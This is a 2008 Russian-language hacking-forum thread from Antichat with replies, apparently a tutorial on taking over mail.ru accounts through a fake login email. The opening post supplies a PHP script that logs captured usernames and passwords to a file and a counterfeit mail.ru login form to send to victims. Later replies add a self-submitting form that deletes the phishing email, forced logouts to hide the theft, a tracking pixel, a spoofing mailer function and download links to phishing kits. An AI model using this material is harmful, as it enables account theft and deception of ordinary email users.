Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Взлом почты на mail.ru [СИ] (https://forum.antichat.xyz/showthread.php?t=72868)

Chaak 06.06.2008 20:12

Взлом почты на mail.ru [СИ]
 
[::.INTRO.::]

Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.
Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ;)", сами поймете.
Статья сгодится для новичков. Гуру просьба не читать.

[::.PREPARATION.::]

Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.
Можно зарегистрироваться на любом из этих:
*только заранее убедитесь что хостинг поддерживает PHP
Код:

km.ru
nextmail.ru
hobby.ru
webrise.ru
lapin.ru
free.dl-hosting.ru
hostow.net
beplaced.ru
777host.ru
paltus.ru
miraclehost.ru
freebox.ru
alfaspace.net
k70.ru
hosting.promostudio.ru
chat.ru
maxhost.ru
nixup.com
e2e.ru
noka.ru
newmail.ru
boom.ru
h15.ru
hut.ru
jino-net.ru
pochta.ru
unlimhost.ru
onepage.ru
by.ru
sbn.bz
yard.ru
domainhosting.ru
orthodoxy.ru
webservis.ru
ru-web.net
activehost.ru
househost.ru
bestof.ru
addr.ru
hosting.dump.ru
pesni.ru
medbox.ru
fatal.ru
x5x.ru
hopshot.com
5gigs.com
wagoo.com
orgfree.com
awardspace.com
bobos.ca
www.host.sk
zportal.info
spaceall.de
3x.ro
sretenie.ru
dotgeek.org
sevhosting.net
o2g.net
www.jino-net.ru
www.nixup.com
newmail.ru
ho.com.ua/
wallSt.ru
hut.ru
holm.ru
e2e.ru
fatal.ru
host.sk
ut.ru
H1.ru
Hostmos.ru
Webm.ru
Rdcom.ru
narod.ru
front.ru
nm.ru
chat.ru
boom.ru
by.ru

Зарегистрировали? - идем дальше!
Что нам нужно:
Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):
PHP код:

<?php
$f
=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Рассмотрим скрипт поподробнее:
Код:

<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.
  • Сохраним в файл mes.php и зальем на хостинг.
  • Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777
Пожалуй с хостингом - все!
Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код письма:
PHP код:

<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<
td id=aj_body>
<
div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<
table cellpadding=0 cellspacing=0 border=class=login>
<
tr>
<
td>Пользователь отправил вам скрытое письмо.<brДля просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</
tr>
</
table><font color=00;33;66 FACE="Arial" >
<
h4 >Авторизация</h4>
</
font>
<
table cellpadding=0 cellspacing=0 border=class=login>
<
form method="GET" action="http://адресссайта/mes.php">
<
input type="hidden" name="mail" value="1">
<
tr>
<
td width=75>
<
img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<
td width=150>
<
input type="text" name="Login">
</
td>
<
td width=75>
<
select name="Domain">
<
option value="mail.ru" SELECTED>@mail.ru</option>
<
option value="inbox.ru">@inbox.ru</option>
<
option value="list.ru" >@list.ru</option>
<
option value="bk.ru" >@bk.ru</option>
</
select>
</
td>
</
tr>
<
tr>
<
td>
Пароль
</td
<
td>
<
input type="password" name="Password">
</
td>
<
td>
<
a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</
td>
</
tr>

<
tr
<
td> </td>
<
td>
<
input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
</
td>
<
td> </td>
</
tr>
<
tr>
<
td> </td>
<
td>
<
input type="Submit" value=" Войти " xstyle="margin-top:4px">
</
td>
<
td> </td>
</
tr></form>
</
table><br><br>
Чтобы подробней узнать об услугах посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<
base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div

Укажите в параметре action тега form - адресс вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.
[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.
Теперь остается отправить жертве письмо, желательно с подменой адресса.
Сделать это можно здесь:
Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва клюнет на это, значит вам повезло).
Узнать пароли вы сможете в файлике mail.txt.

[::.END.::]

Думаю все.
А уж как подойти ко взлому решать вам.
Спасибо за внимание!
Жду ваших отзывов.
До свидания!

sabe 06.06.2008 20:17

видел много материала по фейкам но все было както разброшено.. сдесь все собрано и пошагово разсмотрено. вобшем ГУД.)

satana8920 06.06.2008 21:27

в принципе у каждого метода есть свои плюсы и минусы (без этого просто никак)
юудь то ббрут или протроянивание или фейки
поставил + статья наиболее полная для новичка

[:|||||:] 06.06.2008 21:39

А как же это?
http://i.piccy.kiev.ua/i2/c1/24/afa5...45defdb59.jpeg

satana8920 06.06.2008 22:19

Цитата:

Сообщение от ChaaK
У меня такого ни разу не повлялось!
это можно обойти изменив буквы в словах!

так дополняй скорее свою статью
:(

ufoPlast 07.06.2008 04:47

Цитата:

Сообщение от Zitt
ерунда.. даже на ачате такихже статей куча.... ненадо было писать)

Статья не супер, но из-за таких как вы, считающих себя гуру, новые статьи редко пишутся! Людям просто не хочется писать статьи во избежании такой тупой критики... Что это за аргумент? -ерунда, говно и т.д. Напиши свой способ.
Сам сталкивался с такой штукой, пишешь статью, а ее удаляют. Причиной назвали сложность осуществления предложенного метода... Я чуть под стол не упал...
Я считаю не нужно отбивать у людей желание писать, хоть что то...

m9chik 07.06.2008 08:04

Моё мнение:
Не сложно,просто.
Но таких тем действительно было оч много.
Это называеться фейк и автор ничё про это не сказал.
Но и в тоже время от этого фейка мало что будет поскольку я чёто запутолся тем что будет отпровляться пись,а тама будет запрос авторизации. и тутже тама будет висеть табличка от администрации.

slider 07.06.2008 10:41

Цитата:

Сообщение от ChaaK
Предложите что-нибудь лучше, кроме брута и протроянивания.

XSS или XSS + ФЕЙК ...

Zitt 07.06.2008 15:32

ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...

byblik 07.06.2008 15:52

Цитата:

Сообщение от Zitt
ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...

А я соглашусь с ufoPlast, все он правильно сказал.

Lucky_Student 07.06.2008 16:19

ИМХО, СИ легче юзать на Яндексе.
Поясню:
- Отсутствуют какие-либо предупреждения по поводу того что пароль можно украсть
- Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд

Вообщем мну предпочитает яндекс. :)
Хотя мэйл тоже слабо защищен...

cb93ka 29.07.2008 22:37

Цитата:

Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд
а что мешает "анонимно" послать мыло от admin@yandex.ru ?

Ponchik 02.08.2008 16:34

Тема немного старовата, но я вставлю свои 5 копеек :)
1)Зачем передовать всё через GET это палевно, меняем на POST и всё.
2)Зачем перенаправлять юзера на непонятное письмо http://win.mail.ru/cgi-bin/readmsg?id=121112312 если мы можем посмотреть refer и отправить его обратно на наше письмо, но ябы селал подругому...

Из рефера получаем ID письма (буду помечать его как messid), в фрейме грузим
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid
это перенесёт письмо в корзину, потом вызываем
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid&confirm=on
Это спросит хотимли мы удалить навсегда письмо?
Дальше вот такая форма
Код HTML:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250" />
<title>x3k</title>
</head>
<body onload="pe4enkiiiii.submit()">
<form action="http://win.mail.ru/cgi-bin/movemsg" method="POST" name="pe4enkiiiii">
<input type="hidden" name="confirm" value="on">
<input type="hidden" name="remove" value="1">
<input type="hidden" name="id" value="[COLOR=Red]messid[/COLOR]">
</form>
</body>
</html>

Это сносит письмо насмерть :D
Дальше в фрейме вызываем http://win.mail.ru/cgi-bin/logout это выход с ящика, потом перенаправляем юзера на http://win.mail.ru/cgi-bin/login
Всё, юзверь думает ошибся пассом, заходит, письма нет, ну и *** с ним :)

Не тестировал, токо частично, должно работать... :)
Протестировал, работает :D
=============
ОУ! Даже знаете чо делаем... После того как юзверь прищёл к нам на скрипт делаем 2 фрейма, первый 100% http://win.mail.ru/cgi-bin/msglist второй 0% где и будут происходить наши действия, этож ваще безпалевно :D

deniska1517 02.08.2008 18:12

молодец, уделил время, написал. ну, что - + вообщем

Ponchik 02.08.2008 19:47

Немного доработал скрипт, качать отсюда: http://slil.ru/26028341 (пасс antichat) эту не качай, качай на 2 поста ниже, там 2 версия :)

В скрипте 5 файлов
index.php - скрипт, записывающий инфу в логи
frame.php - скрипт, удаляющий письмо
log.txt - подробный лог
minilog.txt - пишется мыло и пасс
readme.html - инструкция с HTML кодом который надо отсылать

В общем заливаем скрипты куда-то, читаем readme редактируем HTML код под себя (для нубов: Чтоб отправить HTML в письме через mail.ru, нмакаем "Написать письмо" там жмакаем "Расширенный формат" вставляем HTML, отправляем) тама отредактировать 1 строку надо - ссылку на сниффер :)

Чел открывает письмо, тама месага типо скриптое письмо, введите логин и пасс, форма очень очень поломаная, но не я её писал, вопросы к ТСу :D
Так вот, чел пишет логин пасс, нажимает вход, логин и пасс идёт нам на скрипт, скрипт записывает логи и пасс в лог, при этом грузятся 2 фрейма, 1 фрейм взод на mail.ru, 2 фрейм получает от скрипта номер письма и 4 раза пытается его удалить (достаточно 2 но бывают лаги) после того как скрипт провёл свои грязные дела он перекидывает пользователя на почту, в которой от письма не осталось и следа и логи и пароль остались у нас, круто, да? :cool:
:D
P.S> Впервые этим занимаюсь и просто от нечего делать :)
=========
Гы гы, чел в аське повёлся :D Мля, а это работает оказывается :)))
Кстате в .htaccess пропишите
Код:

<files "log.txt">
order allow,deny
deny from all
</files>
<files "minilog.txt">
order allow,deny
deny from all
</files>

Ато не кайф если логи прочитают

Kusto 02.08.2008 21:08

понч впринципе неплохо- маленькое дополнение- можно там еще прикрутить снифер- да куки мы неполучим-Но мы точно будем знать открыл ли пользователь наше письмо или он еще в свой ящик незаходил, кстати пользовался- когда снифер от GreenBear был живой и точно знал айпишку- открывшего письмо и забила ли жертва хрен на наш суперфейк))) и стоит ли от нее ждать пассов)))

Ponchik 02.08.2008 22:34

Сделал, http://slil.ru/26028567 пасс antichat
Это так сказать версия 2.0 но как это называется я хз :) Сами придумайе название :)
+При открытии письма мы узнаем об этом
+В инструкцию добавлен javascript, чтоб дого не копаться
+Добавлен .htaccess чтоб сами не разбирались что там и куда
=====================
Я кстати с год назад придумал и отписал тута новый способ прикола над форумчанами, там вот он и на mail.ru покатит, отсылаем письмо

<h1>Ты грязный овце*б :D </h1>
<img src="http://win.mail.ru/cgi-bin/logout">

Такое западло :) Но можно будет удалить письмо из списка :(

lmns 12.08.2008 23:01

Пару слов скажу.
1. если картитки отключены, то не работает HTTP_REFERER, соответственно письмо не удаляется.
2. Может я чего не понял, но временно открывается новое окно http://fake.ru/index.php, а его ни как нельзя сделать размерами 0х0 ?

iron-viper 13.08.2008 15:26

Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.

MRAK9 13.08.2008 17:05

Цитата:

Сообщение от iron-viper
Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.

Дело в том что твой код отправляется как txt
Не морочь себе голову и используй скрипт(отправил в личку)

iron-viper 13.08.2008 19:42

Цитата:

Сообщение от MRAK9
Дело в том что твой код отправляется как txt
Не морочь себе голову и используй скрипт(отправил в личку)

за старания держи +1 конечно, но написал боле интереснее функцию

PHP код:

function send_mail($To$From$Text$Subject){
     
$message "";

     
$Text str_replace("\n"'<Br/>'$Text);
     
$headers "From: ".$From."\n";
     
$headers .= "X-Mailer: PHP4\n";
     
$headers .= "X-Priority: 3\n";
     
$headers .= "MIME-Version: 1.0\n";
     
$headers .= "Content-Type: multipart/alternative; boundary=\"==MIME_BOUNDRY_alt_main_message\"\n\n";
     
$message .= "--==MIME_BOUNDRY_alt_main_message\n";
     
$message .= "Content-Type: text/plain; charset=windows-1251\n";
     
$message .= "Content-Transfer-Encoding: 7bit\n\n";
     
$message .= $Text "\n\n";
     
$message .= "--==MIME_BOUNDRY_alt_main_message\n";
     
$message .= "Content-Type: text/html; charset=windows-1251\n";
     
$message .= "Content-Transfer-Encoding: 7bit\n\n";
     
$message .= "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n";
     
$message .= "<HTML><BODY>\n";
     
$message .= $Text "\n";
     
$message .= "</BODY></HTML>\n\n";
     
$message .= "--==MIME_BOUNDRY_alt_main_message--\n";
     return 
mail($To$Subject$message$headers);



DIMON4G 28.08.2008 14:58

Я отправляю из отбук экспресс и нет почему-то хтмл кода, тока тхт, помогите, вот код который я пытаюсь отправить:
Код:

<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_body>
<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<table cellpadding=0 cellspacing=0 border=0 class=login>
<tr>
<td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</tr>
</table><font color=00;33;66 FACE="Arial" >
<h4 >Авторизация</h4>
</font>
<table cellpadding=0 cellspacing=0 border=0 class=login>
<form method="POST" action="http://mail-m.freehostia.com/index.php">
<tr>
<td width=75>
<img src="http://mail-m.freehostia.com/readsniffer.png" height=1><img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<td width=150>
<input type="text" name="login">
</td>
<td width=75>
<select name="domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td> 
<td>
<input type="password" name="password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>

<tr> 
<td> </td>
<td>
<input type=checkbox value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table><br><br>
Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>


Alekzzzander 13.09.2008 19:14

ссылка для анонимной отправки почты не работает, подскажите как их отправлять анонимно, со вставкой html кода (желательно скрипт)

Rejjin 13.09.2008 20:39

и если мона то опишите как отправить уже обработанною

lmns 14.09.2008 16:45

Alekzzzander держи скрипт http://webfile.ru/2230234

Alek$$$ 31.10.2008 18:09

можете кто нить скрипты выложить(которые на хостинг надо заливать?

Alexandr II 31.10.2008 21:59

Цитата:

Сообщение от Alek$$$
можете кто нить скрипты выложить(которые на хостинг надо заливать?

_http://webfile.ru/2351393
там четыре фейка, майл.ру, яндекс, юкоз и рамблер ;)

xryst85 08.11.2008 22:15

Цитата:

Сообщение от Ponchik
Сделал, http://slil.ru/26028567 пасс antichat
Это так сказать версия 2.0 но как это называется я хз :) Сами придумайе название :)
+При открытии письма мы узнаем об этом
+В инструкцию добавлен javascript, чтоб дого не копаться
+Добавлен .htaccess чтоб сами не разбирались что там и куда

Перевыложи пожалуйста архив со скриптами, очень надо!

Alek$$$ 08.11.2008 22:31

Да, перезалейте плиз. И подскажите хостинг платный, но не очень дорогой для этих целей.

Ponchik 09.11.2008 17:18

http://slil.ru/26316711

xryst85 09.11.2008 20:50

Ponchik Респект за архив +1! подскажи плиз как теперь отправить письмо в HTML формате, юзаю TheBat но там помоему нет такой функции!?

k0lbasa 09.11.2008 20:54

Цитата:

Сообщение от xryst85
Ponchik Респект за архив +1! подскажи плиз как теперь отправить письмо в HTML формате, юзаю TheBat но там помоему нет такой функции!?

расширенный режим при отправке прямо с мэйл-ру
а вот скрипт кто бы подсказал, где можно в хтмл отправлять еще и адрес подменять, а то я уже кучу испробовал, не доходит до адресата

xryst85 09.11.2008 22:12

насчет скрипта тут гдето в этой теме видел, но адрес он там не подменяет.

Alek$$$ 09.11.2008 23:59

Я Crazy mail юзаю

xryst85 10.11.2008 01:17

дай ссылку где дернуть его мона, желательно с мануалом!

warlok 10.11.2008 01:21

Вот крейзи мейл , но сейчас помойму их бесплатный серв если и работает то редко.
_http://depositfiles.com/ru/files/3394597

binarnik 10.11.2008 15:42

Цитата:

расширенный режим при отправке прямо с мэйл-ру
а вот скрипт кто бы подсказал, где можно в хтмл отправлять еще и адрес подменять, а то я уже кучу испробовал, не доходит до адресата
iron-viper выложил рабочую функцию, вот залей этот скрипт http://slil.ru/26319681 на хост и тыкай кнопки в форме...

Я пробовал высылать форму выложенную ТС, одна проблема кнопка submit не отображается в письме, вместо нее обычное поле для ввода, то же самое на рамблере и яндексе, как решить эту проблему кто знает?

warlok 10.11.2008 22:17

Цитата:

iron-viper выложил рабочую функцию, вот залей этот скрипт http://slil.ru/26319681 на хост и тыкай кнопки в форме...

Я пробовал высылать форму выложенную ТС, одна проблема кнопка submit не отображается в письме, вместо нее обычное поле для ввода, то же самое на рамблере и яндексе, как решить эту проблему кто знает?
перезайлете куданить например на дамп а то оттуда некачает.

binarnik 11.11.2008 00:58

Цитата:

Сообщение от warlok
перезайлете куданить например на дамп а то оттуда некачает.

раз http://webfile.ru/2379569
дваз http://www.mediafire.com/?yenwmttnmty

warlok 11.11.2008 01:28

а нету у кого нить для отправки писем в html ? а то тот скрипт что в посте выше отправляет в txt.


Время: 11:49